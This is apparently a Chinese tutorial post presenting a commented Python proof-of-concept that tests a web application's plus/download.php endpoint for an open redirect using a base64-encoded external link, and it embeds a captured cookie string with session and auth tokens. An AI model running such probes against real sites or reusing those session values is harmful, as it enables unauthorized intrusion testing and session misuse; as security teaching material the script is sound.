
html+%3ca%3e+id,Python大法之从HELL0 MOMO到编写POC(十二)

牛骞仕
2023-12-01

# -*- coding: utf-8 -*-

import requests

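def POC(url):
    """Report whether plus/download.php under *url* redirects to an external host.

    The request carries a ``link`` parameter holding the base64 form of
    ``http://bbs.ichunqiu.com``. If the server answers with a redirect whose
    ``Location`` header contains that host, the endpoint forwards users to a
    caller-supplied address without validation (an open redirect). The usual
    server-side remedy is to check the decoded target against an allowlist
    of permitted hosts before redirecting.

    Args:
        url: Base URL of the application under test. It must end with '/',
            because the path is appended by plain string concatenation.

    Returns:
        None. Prints 'True' when the external redirect is observed and
        'False' otherwise (including when no Location header is returned).
    """
    # NOTE(review): these headers look like a raw browser capture. Host is
    # pinned to 'localhost', so the result is only meaningful for the local
    # demo URL. The Cookie value carries session identifiers (PHPSESSID,
    # *_auth); rotate them and keep them out of published scripts.
    headers = {
        'Host': 'localhost',
        'Cache-Control': 'max-age=0',
        'Upgrade-Insecure-Requests':'1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'Cookie': '__guid=111872281.1617071225746359600.1514021210290.158; ver=free; passinfo=%E5%85%8D%E8%B4%B9%E7%89%88+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%2Fservice_1.html%22+target%3D%22_blank%22%3E%3Cfont+color%3D%22green%22%3E%28%E8%B4%AD%E4%B9%B0%E6%8E%88%E6%9D%83%29%3C%2Ffont%3E%3C%2Fa%3E; UM_distinctid=160889af2500-062927d1d2a474-5d4e211f-1fa400-160889af251640; CNZZDATA80862620=cnzz_eid%3D600104656-1514116496-%26ntime%3D1514116496; bdshare_firstime=1514120344522; PHPSESSID=93425c5800b892d1625a7e2772e0cc93; AJSTAT_ok_times=1; __tins__4329483=%7B%22sid%22%3A%201514648644160%2C%20%22vd%22%3A%2012%2C%20%22expires%22%3A%201514650918749%7D; __51cke__=; __51laig__=12; CNZZDATA1702264=cnzz_eid%3D481143048-1514986272-%26ntime%3D1514986272; TS4_lang=zh-cn; TS4_TSV4_LOGGED_USER=juVZCAnP1%2F5u%2F08gg%2BV8B3fsJlxLGuip; CNZZDATA1254932726=2083485242-1514986792-http%253A%252F%252Flocalhost%252F%7C1515147524; TS4_TSV4_ACTIVE_TIME=1515152586; ToxD_2132_saltkey=Cy7EYFjC; ToxD_2132_lastvisit=1515217736; ToxD_2132_seccode=2.52b3024ef3cf030111; ToxD_2132_auth=a9d6n%2BIQyXqM8PiyCpPvy3IMoZxhofeEf7OSG0a0ha3YP71Y4GjtOXrUgSX7Fkq%2FEYRz4eD2jrDnDL8jD48T; ToxD_2132_nofavfid=1; ToxD_2132_ulastactivity=bf78u5QlxDtB03kbbeVnmed4IrFbhRildA80nAhmZNbSjbVOc1cc; ToxD_2132_lip=127.0.0.1%2C1515325183; monitor_count=45',
        'If-None-Match': '4f94-4ca24c1a3a435',
        'If-Modified-Since': 'Thu, 20 Sep 2012 16:38:43 GMT',
        'Connection': 'close',
    }

    attack_url = url + 'plus/download.php?open=1&link=aHR0cDovL2Jicy5pY2h1bnFpdS5jb20%3d'

    # allow_redirects=False stops requests from following the 301/302 itself,
    # so the redirect target stays readable in the Location response header.
    # The timeout keeps the check from hanging on an unresponsive server.
    response = requests.get(
        attack_url,
        headers=headers,
        allow_redirects=False,
        timeout=10,
    )

    # A response without a redirect has no Location header; treat that as
    # "not redirected" instead of failing with KeyError.
    location = response.headers.get('Location', '')

    # Substring match only: a same-site redirect that merely echoes the host
    # in its query string would also print 'True'.
    if 'bbs.ichunqiu.com' in location:
        print('True')
    else:
        print('False')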

if __name__ == '__main__':
    # When run as a script, check the local demo application only.
    demo_base_url = 'http://localhost/urlredirectdemo/'
    POC(demo_base_url)
